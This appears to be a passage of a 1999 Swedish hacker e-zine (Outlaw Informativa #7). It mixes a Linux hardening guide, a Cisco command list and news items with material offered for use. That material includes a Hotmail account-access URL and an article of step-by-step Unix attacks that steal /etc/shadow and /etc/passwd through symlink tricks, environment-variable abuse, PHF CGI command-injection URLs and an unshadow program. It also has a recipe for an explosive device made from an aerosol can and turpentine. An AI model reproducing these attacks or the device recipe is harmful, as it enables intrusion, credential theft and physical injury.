ger till lite på artikeln efter som är märkt lite saker. Detta kallas för
|
|
External Message och fungerar bara om kanalen har satt +n (No external Messa-
|
|
ges)
|
|
|
|
Sen blir man ju tvingad att tacka Bhunji som gav förslag på topicen, ville
|
|
inte låta de se löjligt ut, BLÄÄÄ.
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
Vem som helst kan läsa din Hotmejl
|
|
-----------------------------------------------------------------------------
|
|
Jo som vanligt så är ju Microsoft inga säkerhets experter. Ännu ett liten
|
|
lucka i Hotmails system. Du kan läsa vem som helsts account och det är ju
|
|
lamt men andvändbart, många miljoner andvänder hotmail och ofta skickas
|
|
mail med passwds till ditt nya t.ex. X00M konto.
|
|
|
|
Connecta bara till:
|
|
|
|
http://207.82.250.251/cgi-bin/start?curmbox=ACTIVE&js=no&login=USERNAME&passwd=eh
|
|
|
|
Med din favorit HTTP klient. Observera att USERNAME byts ut mot valfritt
|
|
username ;)
|
|
|
|
Detta funkade dock inte länge, redan fixat. Men så ni vet vad hålet va. Är d-
|
|
et någon som tekniskt vet hur bakdörren funkade så kan ni skicka en jävel
|
|
till mig på keytrace@usa.net.
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
0ldschool Hacking: /etc/shadow
|
|
-----------------------------------------------------------------------------
|
|
|
|
[Förord]
|
|
¯¯¯¯¯¯
|
|
Jag tänke förklara ett par gamla godingar, alltså olika tekniker för att kun-
|
|
na rycka åt sig /etc/shadow. Jag vill inte ha en massa klagomål på denna
|
|
artikel, den är ju inte direkt för avancerad och det är ju inte jag heller =)
|
|
|
|
|
|
[XFREE86]
|
|
¯¯¯¯¯¯¯
|
|
Detta ska funka på de flesta *nix system som kör XFREE86 och utförs med:
|
|
|
|
XF86_SVGA -config /etc/shadow
|
|
|
|
Om det inte är Fredag den 13 och du inte har fått ditt dagliga rövknull av
|
|
far din så ska /etc/shadow ge utdata på terminalen.
|
|
|
|
|
|
[Hål i libc 5.4.7]
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
Jao, i de flesta *nix systemen ska det också finnas ett "Security hole" i
|
|
libc 5.4.7 som låter dig sätta resolv_hots_conf till vilken fil som helst. Om
|
|
du kan köra ett SUID program som andvänder resolv_host_conf typ ping, tracer-
|
|
oute, ssh, rlogin. Om du nu t.ex. andvänder ping så ska ping ge /etc/shadow
|
|
som utdata på terminalen.
|
|
|
|
1. Skriv bash för att starta bash skalet.
|
|
2. Skriv export RESOLV_HOST_CONF=/etc/shadow
|
|
3. Skriv ett av fil namnen ovan med asdf, t.ex. ping asdf
|
|
|
|
|
|
[Rycka /etc/shadow med dip]
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
En del Linux Slackware burkar kan du andvända dip för att exploita root, den
|
|
kan också andvändas för att rycka åt sig /etc/shadow.
|
|
|
|
ln -s /etc/shadow /tmp/buh.dip /sbin.dip -v /tmp/buh.dip
|
|
|
|
|
|
[Gammalt .lastlogin trick]
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
Sen finns det ett gammalt SCO och Sys V .lastlogin trick. Kolla så att .las-
|
|
tlogin i ditt hem bibliotek så att den ägs av root eller auth
|
|
|
|
rm -f ~rm -f ~/.lastlogin
|
|
ln -s ~/.lastlogin /etc/passwd
|
|
|
|
Logga nu ut och logga in igen så du kan skapa länken.
|
|
|
|
cat .lastlogin > passwd
|
|
rm -f ~/.lastlogin
|
|
|
|
|
|
[ypcat på möglande Unix system]
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
Sen kan du alltid testa ypcat /etc/passwd som kan funka på söndermöglade
|
|
Unix system.
|
|
|
|
|
|
[PHF är en historia]
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
Egentligen tänke jag inte ta med PHF eftersom det är söndermöglad och att
|
|
det inte finns nån server som har PHF hålet. Men det finns faktiskt gamla
|
|
Asiatiska system där PHF fortfarnande funkar.
|
|
|
|
http://www.target.com/cgi-bin/phf?Qalias=x%ffcat%20/etc/passwd
|
|
|
|
eller kanske...
|
|
|
|
http://www.target.com/cgi-bin/phf?Qalias=x%0Acat%20/etc/passwd
|
|
|
|
|
|
[Unshadow .c script]
|
|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
|
Kan funka på en del *nix versioner som är gamla som gatan.
|
|
|
|
#include <pwd.h>
|
|
|
|
main()
|
|
{
|
|
struct passwd *p;
|
|
while(p=getpwent())
|
|
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
|
|
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
|
|
}
|
|
|
|
|
|
Källa: shadow.txt
|
|
|
|
Detta borde läsas av allas petiga typer!
|
|
All information i artikeln är inte helt
|
|
skrivet med egna ord. Så kom inte och
|
|
klaga på att texten är likt de engelska
|
|
orginalet.
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
Linux Säkerhet Administration
|
|
-----------------------------------------------------------------------------
|
|
Jag är relativt ny på Linux och blev sugen att skriva lite om säkerhet när
|
|
jag grubblade igenom axxezz's artikel i SuZ om Linux security. Så jag hade
|
|
tänk förklara enkelt om säkerhet i olika dist o unix system i allmännhet.
|
|
Jag kommer hålla mig till 2 vanliga dist, ulmhhh...Redhat och Slackware.
|
|
För er som inte orkar lusa igenom allt för att veta vad artikeln innehåller
|
|
så kan jag berätta det redan nu ;) ...Password Policy, Password Shadowing,
|
|
TCP Wrappers, Anonymous FTP, 0nda services och Loggfiler.
|
|
|
|
[Password Policy]
|
|
|
|
Nej nu ska jag inte ta upp nåt jävla shit om hur man väljer rätt lösenord
|
|
som varenda pc tidning på markaden skriver om eller har skrivit om, jag bryr
|
|
mig inte om vilka som andvänder bra lösenord eller inte, det skapar bara för-
|
|
delar för omgivninge. Men jag ska däremot ta upp hur man får systeme t att
|
|
inte tillåta passwd under 8 tecken osv. Detta är dock mest andvändbart för
|
|
admin på nån skola. Men det kan va kul att veta än då.
|
|
|
|
I Slackware så öppnar du /etc/login.defs med en skön text-editor. De t första
|
|
du ska kolla är om LOG_OK_LOGINS är satta på yes, sen kan du sätta
|
|
ENABLE_MD5_CRYPT på yes (kryptering är ju bra i alla fall, om det inte är
|
|
en fel programmerad förstörande algoritm :I) Om du vill kunna andvända
|
|
passwd över 8 tecken så kan du ändra värderna på variblerna PASS_MAX_DAYS,
|
|
PASS_MIN_DAYS, PASS_MIN_LEN och PASS_WARN_AGE till några lämpliga värden.
|
|
|
|
I Redhat så öppnar du också /etc/login.defs och sätter variblerna
|
|
PASS_MAX_DAYS, PASS_MIN_DAYS, PASS_MIN_LEN och PASS_WARN_AGE till det som
|
|
känns rätt. Skilladen mellan konfigurationen i Slackware och Redhat är nästan
|
|
ingen, configurationen om man vill andvända MD5 görs det i login.defs om man
|
|
andvänder Slackware, det configueras vid installation i Redhat. MD5 är en
|
|
one-way algoritm som menas att den aldrig kan dekrypteras, algoritmen är inte
|
|
hemligt så det som behövs är att skriva ett program som krypterar från en
|
|
ordlista och gämnför med de krypterade passwd:et i /etc/passwd eller i
|
|
/etc/shadow som är en standardisering för nya Linux system, /etc/shadow kan
|
|
dock inte nås av andra andvändare, men det finns tekniker så att man kan
|
|
rycka åt sig en skuggad passwd fil. Mer om Password Shadowing ses nedan.
|
|
|
|
[Password Shadowing]
|
|
|
|
Det första du ska kolla är att /etc/shadow finns, om inte så har du valt vid
|
|
installationen att inte andvända password shadowing och då får du köra
|
|
pkgtool och installera de själv. När du installerat pkgtool så fåru köra
|
|
kommandona /usr/sbin/pwconv och /usr/sbin/grpconv.
|
|
|
|
[TCP Wrappers]
|
|
|
|
Note: Konfigurationen av TCP Wrappers är samma i alla dist.
|
|
|
|
För det första måste du veta vad en TCP Wrapper är för nåt annars är det
|
|
inte så bra, !LOL! jaja, en TCP Wrapper andvänds för att kunna styra vilka
|
|
datorer som får andvända vilka tjänster. Detta finns definerat i
|
|
/etc/inetd.conf. Det finns två filer som styr detta och det är
|
|
/etc/hosts.deny och /etc/hosts.allow. Först ska jag gå igenom hur man låser
|
|
datorn för alla utom ett antal IP nummer. Första steget är att öppna
|
|
/etc/hosts.deny och skriva in raden ALL: ALL. För att ställa in vilka som
|
|
får komma åt din dator editerar du /etc/hosts.allow och skriver in t.ex.
|
|
ALL: 10.13.95.03. Istället för ALL så kan man skriva in t.ex. en pop3 server
|
|
eller in.telnetd, t.ex. in.telnet.d: 10.13.95.03 eller pop3.ondska.org: IP.
|
|
detta. Detta begränsar alltså vilka som får logga in på systemet och vilka
|
|
som får läsa sin epost. Du kan också blockera olika IP-nummer men sen tillå-
|
|
ta alla andra. Det gör du i /etc/hosts.deny. Editera hosts.deny och skriv
|
|
t.ex:
|
|
|
|
ALL: .hostname.com
|
|
ALL: ipnummer
|
|
|
|
[Anonymous FTP]
|
|
|
|
Som standard är Anonym FTP påslagen efter installation. Om du tycker det är
|
|
läskigt att vem som helst kan logga in som anonymous. Vilka som inte får
|
|
logga in anges i /etc/ftpusers. Öppna bara /etc/ftpusers med emacs, vi, pico
|
|
eller vad fan du vill och lägg till raderna anonymous och ftp.
|
|
|
|
[0nda services]
|
|
|
|
Det finns många services i Linux som skapar möjligheter, för att göra ditt
|
|
system en aning säkrare så editerar du /etc/inetd.conf och sätter # framför
|
|
alla läskiga tjänster.
|
|
|
|
Slackware.
|
|
|
|
För det första ska du studera indetd.conf noga och fundera vad datorn ska
|
|
andvändas till och sen stänga av alla onödiga tjänster. Finger, shell, login,
|
|
ntalk, systat och netstat bör stängas av och om du andvänder en äldre version
|
|
av Slackware så är det också bra att stänga av imapd som va osäker. Telnet
|
|
och ftp ska man ta och tänka lite om dom ska va på eller av, eftersom passwd
|
|
skickas i klartext och kan enkelt sniffas. Om de verkligen absolut måste and-
|
|
vändas..kolla så att du alltid håller den uppdaterad till senaste versionen.
|
|
SSH (ftp.sunet.se/pub/security/tools/net) eller Kerberos (http://www.pdc.kth-
|
|
.se/kth-krb) är iofs ett bättre alternativ eftersom allt krypteras vid överf-
|
|
öringen. Om du inte fattade hur man stände av en tjänst så berättar jag igen,
|
|
sätt en # framför den tjänst du vill stänga av och kör killall -HUP inetd för
|
|
att uppdatera konfigurationen. Även /etc/rc.d/rc.M och /etc/rc.d/rc.inet2 bör
|
|
undersökas där du kan stänga av olika tjänster.
|
|
|
|
Redhat.
|
|
|
|
/etc/inetd.conf har samma uppgift som i Slackware.
|
|
att uppdatera konfigurationen. Även /etc/rc.d/rc.M och /etc/rc.d/rc.inet2 bör
|
|
Gopher, shell, login, talk, ntalk, pop-2, pop-3. finger, time, linuxconf,
|
|
imapd. Om du vill andvända pop-3 och imapd så se till att du uppgraderar till
|
|
den senaste versionen. Som jag sa förut så skickar telnet o ftp passwdn i
|
|
klartext, så om du vill andvända dem så är det bäst att andvända Secure Shell
|
|
(SSH) eller Kerberos. Du stänger av tjänsterna genom att sätta en kommentar
|
|
(#) framför dem och du uppdaterar inetd med killall -HUP inetd. För att stän-
|
|
ga av andra onödiga tjänster kör /usr/sbin/setup och gå in på ntsysv. Stäng
|
|
av allt som inte är nödvändigt och för att få information om de olika tjänst-
|
|
erna så e det bara att trycka F1.
|
|
|
|
[Loggfiler]
|
|
|
|
Det enda sättet att kolla vad som händer på din dator så är det att kolla
|
|
loggarna, visserligen finns det scripts som kan rensa dem men det är större
|
|
chans att se vad som händer eller hinna det innan dom blir rensade om du kol-
|
|
lar dom som en vana. I slackware ligger loggarna /var/log/messages och
|
|
/var/log/syslog. Ge kommandot last dagligen också för att kolla vilka som
|
|
loggat in på datorn.
|
|
|
|
I Redhat ligger loggarna i /var/log/messages och /var/log/secure, sen e de
|
|
också en bra ide att kolla vilka som loggat in på datorn med kommandot last.
|
|
|
|
Det finns program som kan undersöka loggarna automatiskt, sånna kan man hitta
|
|
på http://www.alw.nih.gov/Security/prog-monitor.html (Swatch och logsurfer)
|
|
|
|
[Efterord]
|
|
|
|
Jag vet att detta inte va den bästa artikeln, men information är alltid
|
|
information. Om du undrar nåt eller vill ge credits (LOL) så maila keytrace@-
|
|
usa.net
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
Cisco kommando lista
|
|
-----------------------------------------------------------------------------
|
|
<1-99> - Session number to resume
|
|
access-enable - Create a Temporary Access-List
|
|
access-profile - Apply user-profile to interface
|
|
clear - Reset functions
|
|
connect - Open a terminal connection
|
|
disable - Turn off privileged commands
|
|
disconnect - Disconnect an existing network connection
|
|
enable - Turn on privileged commands
|
|
exit - Exit from the EXEC
|
|
help - Description of the interactive help system
|
|
lock - Lock the terminal
|
|
Login - Login as an particular user
|
|
logout - Same as 'exit'
|
|
mrinfo - Request neighbor and version information from a multicast router
|
|
mstat - Show statistics after multiple multicast tracerouter
|
|
mtrace - Trace revers multicast path from destination to source
|
|
name - connection - Name an existing network connection
|
|
pad - Open a X.29 PAD connection
|
|
ping - Send echo messages
|
|
ppp - Start IETF point-to-point protocol (PPP)
|
|
resume - Resume an active network connection
|
|
rlogin - Open a rlogin connection
|
|
show - Show running system information
|
|
slip - Start serial-line (SLIP)
|
|
systat - Display information about terminal lines
|
|
telnet - Open a telnet connection
|
|
terminal - Set terminal line parameters
|
|
traceroute - Trace route to destination
|
|
tunnel - Open a tunnel connection
|
|
where - List active connections
|
|
x28 - Become an x28 PAD
|
|
x3 - Set x3 parameters on PAD
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
Ethernet kort till Windows CE
|
|
-----------------------------------------------------------------------------
|
|
Xirom har kommit ut med ett litet batterisnålt Ethernet kort till Windows CE
|
|
burkar. CompactCard Ethernet 10 so kortet heter är bara hälften så liten som
|
|
ett vanligt PC kort och du kan ansluta dig med 10Mbps och kostar endast och
|
|
jätte bara 1 255:- (exkl. moms) ..nä, mer än min veckopeng. Jag tror att man
|
|
kan köpa den på ICA, fast kanske inte.
|
|
|
|
http://www.xircom.com/compactcard/images/cfe-tr.gif
|
|
http://www.xircom.com/compactcard/images/cfe-123.jpg
|
|
http://www.xircom.com/compactcard/images/cfe-123.jpg
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
Svenska hackers hackade NASA, busted !
|
|
-----------------------------------------------------------------------------
|
|
2 Svenska hackers gripna för intrång i NASAS jätte mega hemliga datorer. De
|
|
två ungdomarna höll till i en Lägenhet på Söder där allt kretsade kring dato-
|
|
rn. En av dom berättade att ta sig in i datorer va som en drog. Dom har bla.
|
|
kommit över hemliga säkerhets listor och riskerar nu 2 års fängelse och
|
|
skadestånd.
|
|
|
|
*sörja*
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
Svin lätt & rolig Bomb
|
|
-----------------------------------------------------------------------------
|
|
Ok, här kommer ett recept på en tämligen lätt bomb, det finns säkert andra
|
|
versioner och former av denna bomb i andra zines. men här kommer den iaf:
|
|
|
|
Vad du behöver:
|
|
|
|
1st Axe/hårspray/adidas liknande spray flaska.
|
|
½ flaska terpentin eller annan långbrinnade&lätt antändlig vätska
|
|
Tändare/Tändstickor.
|
|
|
|
Hur du gör:
|
|
|
|
Häll lite terpentin på marken och lägg sedan burken på terpentin vätskan,
|
|
häll nu på resten av terpentin flaskan över spray burken, järna lite runtom
|
|
oxå. Tänd på och stick iväg ca 10-15meter.
|
|
|
|
Effekt:
|
|
|
|
Först när terpentinet har tagit eld och brunnit mellan 1-3 minuter så kommer
|
|
en liten knall som oftast följs av en till knall och sedan explosionen som
|
|
brukar vara ca 5ggr högre än knallarna, när explosionen kommer så blir det
|
|
som ett typ svampmoln av eld ( typ atombomb ) som sträcker sej ca 1½-2 meter
|
|
upp i luften. Tänk på att inte så för nära burken, för den kommer flyga i
|
|
många delar, och terpentinet som ligger på kommer börja brinna på stället där
|
|
burk flisorna landar. Vi gjorde denna bomb i skogen, det blev en grop i
|
|
marken ca 10-15cm djup och fläckar med aska över allt inom 5-10 meters radie.
|
|
|
|
Var hittar jag grejorna:
|
|
|
|
Terpentin: färghandel, vissa mat affärer.
|
|
Spray Flaska: Tänk själv ;)
|
|
Tändare: Sno från din kedjerökande mamma eller i affären.
|
|
|
|
//dthl
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
Copyright
|
|
-----------------------------------------------------------------------------
|
|
Zinet för skickas över alla protokoll så länge du INTE ändrar det. Jag har
|
|
satt en fet 1337 copyright på detta zine.
|
|
|
|
Heretics Inc., Outlaw Informativa (C)
|
|
|
|
|
|
-----------------------------------------------------------------------------
|
|
3x1t3d(), eller nåt
|
|
-----------------------------------------------------------------------------
|
|
Jopp, så va sagan slut som dom sa på Björnes Magazine. Jag hoppas att du inte
|
|
sörjer. Tänk som min gamla farfar gjorde "0ndska är Kärlek" min farfar va en
|
|
0nd jävel. Nej !!! ...Slut på skitsnacket, ta ut snusen och gå och dö och
|
|
sluta lyssna på mina dåliga skämt.
|
|
|
|
# cat /ezine/o-i/outlaw-07 > /etc/shadow
|
|
|
|
And the story ends...
|
|
|
|
|
|
|
|
.-------------------------------------------------------------------------.
|
|
| Heretics Inc. Outlaw Informativa issue #7, 22:45 1999-09-08 |
|
|
'-------------------------------------------------------------------------'
|
|
|
|
|
|
|
|
|
|
|
|
|
|
-----BEGIN PGP SIGNATURE-----
|
|
Version: PGPfreeware 6.0.2i
|
|
|
|
iQA/AwUBN5zSsnRmgGlPBhFaEQLQngCgjAdjJAjiAqYXs9YTnGFjd0/VaXYAnj+Q
|
|
X3pmKDomoNWBQp8LyYIdwbqm
|
|
=estT
|
|
-----END PGP SIGNATURE----- |